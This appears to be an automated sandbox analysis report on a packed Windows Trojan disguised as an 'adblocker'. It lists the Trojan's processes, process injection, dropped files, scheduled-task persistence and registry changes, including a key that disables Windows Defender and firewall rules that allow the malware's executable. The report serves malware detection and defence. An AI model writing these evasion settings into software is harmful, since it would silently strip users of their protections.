MD5: fe4e0a2705e5b15832079b300c83de5e
SHA1: ba8dccde84f93dd9fcf6f0de672a435172879f83
SHA256: abbe5a0f3bdbc2aa4f5bcbc9047c7a68c4e12dcc9857f7c1af3892aa95b54871
SSDeep: 24576:NYShsisFlQ3IFz7ZimL826AhX5C9vcxIfOm4ue2qgFhX88Fk9qfDdeIZXGa5RMG:bsiAW3Ix7ZiahJC9kxmOmDR7EqLdeIZj
Size: 1541210 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company:
Created at: 2009-06-07 00:41:54
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:924
taeako.exe:900
taeako.exe:2352
taeako.exe:212
taeako.exe:972
taeako.exe:948
taeako.exe:2980
taeako.exe:2644
taeako.exe:1536
taeako.exe:544
taeako.exe:436
taedko.exe:1988

The Trojan injects its code into the following process(es):

taeako.exe:372
tae3ko.exe:1932
taedko.exe:1604
dag17797.exe:552

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:924 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Application Data\IlejwTivc\tae6ko.dll (39329 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\utaujte.js (1447 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\Uninstaller.exe (8560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp (101002 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\naspeomgu.dat (902 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\adblocker_installer__1441686123.txt (16441 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\logo.ico (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\tmp.bpu (10136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp (4 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\tae3ko.exe (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\jquery4toolbar.js (3312 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\tae3ko.dll (20416 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\taedko.exe (13368 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\tae3kod.dll (20416 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\content\khkiaff.js (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\TrayIcons\logo.ico (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\nsislog.dll (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\CavnNotn.dll (4992 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\naspeomgub.dat (569 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\tae6ko.exe (4992 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\tae6kod.dll (39329 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\utils.exe (9527 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\content\narhokgeb.js (6 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\taewko.exe (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\narhokgeb.js (6 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\taeadko.bnp (14184 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\khkiaff.js (1856 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\taeako.exe (4992 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\content\utaujte.js (1447 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\taewdko.bnp (6584 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\content\jquery4toolbar.js (3312 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\nsisos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\StdUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\UserInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\tmp.bpu (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\nsislog.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\CavnNotn.dll (0 bytes)

The process taeako.exe:212 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Application Data\IlejwTivc\naspeomgub.dat (574 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\naspeomgu.dat (1156 bytes)

The process taeako.exe:372 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Tasks\Tempo Runner tae3ko.job (1352 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\tmp30731\dag17797.exe (1509 bytes)
%WinDir%\Tasks\Tempo Runner tae6ko.job (8112 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\naspeomgub.dat (1528 bytes)
%WinDir%\Tasks\Tempo Runner taedko.job (2704 bytes)
%WinDir%\Tasks\Tempo adblocker Runner.job (920 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\naspeomgu.dat (3072 bytes)

The Trojan deletes the following file(s):

%WinDir%\Tasks\Tempo Runner tae6ko.job (0 bytes)
%WinDir%\Tasks\Tempo Runner tae3ko.job (0 bytes)
%WinDir%\Tasks\Tempo Runner taedko.job (0 bytes)
%WinDir%\Tasks\Tempo adblocker Runner.job (0 bytes)

The process taedko.exe:1604 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\lgv[1].js (122 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7c0022298b948a99e406a6310bffea7f (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7c0022298b948a99e406a6310bffea7f_gb (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\8f43b50088266b9870b42ce6ef7ffbde_expire (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\8f43b50088266b9870b42ce6ef7ffbde (122 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\8f43b50088266b9870b42ce6ef7ffbde_gb (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\cmp_ext[1].js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\obbgint[1].js (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\33143a2945258575fcad33e73ceb74c6_gb (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7036a17d3eb33b65353aad26bf7fdd58 (196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ammbg[1].js (137 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7036a17d3eb33b65353aad26bf7fdd58_gb (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7c0022298b948a99e406a6310bffea7f_expire (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\287a420719c8b086bf7e963c3f582b1b (137 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\287a420719c8b086bf7e963c3f582b1b_expire (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\33143a2945258575fcad33e73ceb74c6 (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7036a17d3eb33b65353aad26bf7fdd58_expire (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\3ab6cfcad30baf81fac23ae3890bffc8_expire (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\cxeappconf[1].js (482 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\getcc[1].php (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\3ab6cfcad30baf81fac23ae3890bffc8 (482 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\v1[1].htm (161 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ammapp[1].js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\33143a2945258575fcad33e73ceb74c6_expire (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\3ab6cfcad30baf81fac23ae3890bffc8_gb (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\287a420719c8b086bf7e963c3f582b1b_gb (32 bytes)

The process taedko.exe:1988 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\9e5c6ea61c9caf16791b419f0698cf92 (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\9e5c6ea61c9caf16791b419f0698cf92_gb (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\loader[1].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\9e5c6ea61c9caf16791b419f0698cf92_expire (13 bytes)

The process dag17797.exe:552 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\Offer2.zip (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\inner.png (146 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\blowfish.dll (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\OfferScreen_12.html (1681 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\Math.dll (2489 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\Offer1.zip (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\FirstResult.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\registry.dll (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\SecondResult.txt (611 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\nsCBHTML5.dll (1660 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\nsisunz.dll (211 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\serlib.dll (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\img12_1.jpg (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\DSS_Unq_IMapplication_mon_remote[1].htm (611 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\FCL_Co_Unq_remote_v5[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\OfferScreen_422.html (1969 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\header.bmp (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\manlib.dll (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\GetVersion.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\nsDialogs.dll (9 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012014041520140416 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012014041520140416\index.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd4.tmp (0 bytes)

Registry activity

The process %original file name%.exe:924 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{752B4A11-4D22-4FB3-a52F-C3CB66799418}]
"Publisher" = "adblocker"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\fe4e0a2705e5b15832079b300c83de5e\DEBUG]
"Trace Level" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{752B4A11-4D22-4FB3-a52F-C3CB66799418}]
"DisplayVersion" = "1.1.0.31"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{752B4A11-4D22-4FB3-a52F-C3CB66799418}]
"SetupType" = "71070"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{752B4A11-4D22-4FB3-a52F-C3CB66799418}]
"DisplayIcon" = "%Documents and Settings%\All Users\Application Data\IlejwTivc\logo.ico"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender]
"DisableAntiSpyware" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{752B4A11-4D22-4FB3-a52F-C3CB66799418}]
"DisplayName" = "adblocker"
"UninstallString" = "%Documents and Settings%\All Users\Application Data\IlejwTivc\Uninstaller.exe /ga=1503 /ai=121 /bi=0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC 9F 63 AB DB 79 36 DA 6C 40 E6 3A F2 0F 8F B5"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
"EventMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\ESENT\Process\fe4e0a2705e5b15832079b300c83de5e\DEBUG]
"Trace Level"

The process taeako.exe:900 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "64 37 C8 BF 8A 63 02 AF 3F D8 06 6E 13 2C 9C 27"

The process taeako.exe:2352 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "86 13 E6 58 A6 E0 D4 77 FB 5D 8E 1E C5 21 CF AA"

The process taeako.exe:212 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

"CategoryCount" = "16"
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\taeako\DEBUG]
"Trace Level" = ""

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{752B4A11-4D22-4FB3-a52F-C3CB66799418}]
"InstallDate" = "140526"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{661088FE-EBD0-4612-8C1E-C282158A658C}" = "v2.10|Action=Allow|Active=TRUE|Dir=In|App=%Documents and Settings%\All Users\Application Data\IlejwTivc\taeako.exe|Name=odufaik|"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8F 4B D6 B5 AE 9F B4 F3 2E 8A C5 85 0C 1A FD 33"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{661088FE-EBD0-4612-8C1E-C282158A658C}" = "v2.10|Action=Allow|Active=TRUE|Dir=In|App=%Documents and Settings%\All Users\Application Data\IlejwTivc\taeako.exe|Name=odufaik|"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Documents and Settings%\All Users\Application Data\IlejwTivc]
"taeako.exe" = "%Documents and Settings%\All Users\Application Data\IlejwTivc\taeako.exe:*:Enabled:odufaik"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\All Users\Application Data\IlejwTivc]
"taeako.exe" = "%Documents and Settings%\All Users\Application Data\IlejwTivc\taeako.exe:*:Enabled:odufaik"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\ESENT\Process\taeako\DEBUG]
"Trace Level"

The process taeako.exe:972 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6A 38 B2 83 50 39 6E C0 71 A4 69 D3 07 67 CE 28"

The process taeako.exe:948 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "12 7B C0 15 9B 16 8B 6E 90 07 D7 4A 29 ED 3A AF"

The process taeako.exe:2980 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CD 3F 72 81 8B 2A B7 25 C3 9B 28 0C A7 2E 9E 33"

The process taeako.exe:2644 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AB BF 99 9A 97 CA 44 28 A6 55 D2 69 96 B0 02 7C"

The process taeako.exe:1536 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "79 74 BF C4 76 F0 2C DA 5B 97 7A 2B 1F 99 0F 21"

The process taeako.exe:544 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B1 6D 06 43 63 FE 46 50 E7 CA FD 00 67 AD E6 CD"

The process taeako.exe:436 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 90 A8 A8 34 93 CE AF 65 94 DA 06 09 05 47 93"

The process taeako.exe:372 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "98 CD BE 57 BF 26 58 D1 B5 5E 09 03 26 10 47 F9"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
"EventMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\121_31]
"AMMDCS" = "1503"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"

The process tae3ko.exe:1932 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B0 26 9A 4F 50 C8 5E 2F 44 B0 5B AD C9 05 D6 1A"

The process taedko.exe:1604 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\AppdataLow\Software\jhaduposint\data]
"AAD4DBA9766467aob23" = "60000"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\AppdataLow\Software\jhaduposint\data]
"S132B7B8F1DC15ob23" = "12"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

